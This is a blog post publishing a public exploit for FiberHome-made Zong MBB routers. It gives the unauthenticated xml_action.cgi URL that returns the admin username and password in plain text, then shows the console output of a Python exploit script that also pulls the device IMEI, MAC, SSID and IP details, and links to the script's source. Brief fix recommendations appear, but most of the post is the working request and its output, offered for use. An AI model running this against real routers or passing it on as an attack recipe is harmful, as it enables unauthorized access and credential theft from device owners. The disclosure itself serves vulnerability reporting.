Zong Device Exploit

6
274
Zong Router Exploit

Hello friends how are you i hope that you are all doing great and want to learn more so here is the Public Exploit for the Zong MBB devices Manufactured By FiberHome with this exploit we are able to get the routers Login Details just by connecting with the wifi of the device so lets get started.

Device Information FiberHome Zong MBB Internet Device

Device Hardware Version :=
L529CV5

Device Name (Product Type) :=
LM53SL Wireless Data Terminal

Software Version Number :=
VH529R02C01S38

The main issue over here is due to lack of authentication and other one is that the routers login details are being stored in plain text over CGI XML file which is access able by any one even if he is not logged into the router. Which is not a good practice this is a real important issue to fix the recommended fix to push quick firmware update to the device in which this you can do two thing to fix it

  • Don’t show the content of any CGI XML file over the client side.
  • Or require authentication by the user and then they may be able to view the files content.

The first option is most recommended.

here is the link the the XML file which store the login details.

http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=admin

output to this file :-

This XML file does not appear to have any style information associated with it. The document tree is shown below
<RGW>
       <management>
              <router_username>admin</router_username>
              <router_password>admin</router_password>
              <web_wlan_enable/>
               <httpd_port/>
               <syslogd_enable/>
               <web_wan_enable/>
               <syslogd_rem_ip/>
              <turbo_mode/>
              <customer/>
       </management>
</RGW>

 

 

And to automate this process we have created a Python Exploit for this.

Output Of the Exploit :-

 $ python zong-exploit.py

=============================================================================
= ZONG Modem Authentication Exploiter =
=============================================================================
[i] Using Default GATEWAY IP: 192.168.8.1

[+] We Have a Hit!

Username of Zong Device:
admin

Password of Zong Device:
admin
=============================================================================

[+] We Have a Hit again!

Hardware Version of Zong Device:
L529CV5
Name of Zong Device:
LM53SL
Software Version of Zong Device:
VH529R02C01S38
IMEI of Zong Device!:
869446020306747
WiFi SSID of Zong Device:
hack_the_hacker
MAC Address of Zong Device:
78:52:62:27:a5:df
IP of Zong Device:
10.41.90.208
Gateway of Zong Device:
10.41.90.209
DNS 1 of Zong Device:
10.81.191.14
DNS 2 of Zong Device:
8.8.8.8
=============================================================================

=============================================================================
= Exploit Developed By : Jahanzaib Khan Durrani =
= Vulnerability Found By : Osama Mehmood =
=============================================================================

 

Here is the code you can git it from GitHub.

GitHub Link : https://github.com/OsamaMahmood/Zong-router-exploit

Here is the Video showing how to use the exploit :-

6 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here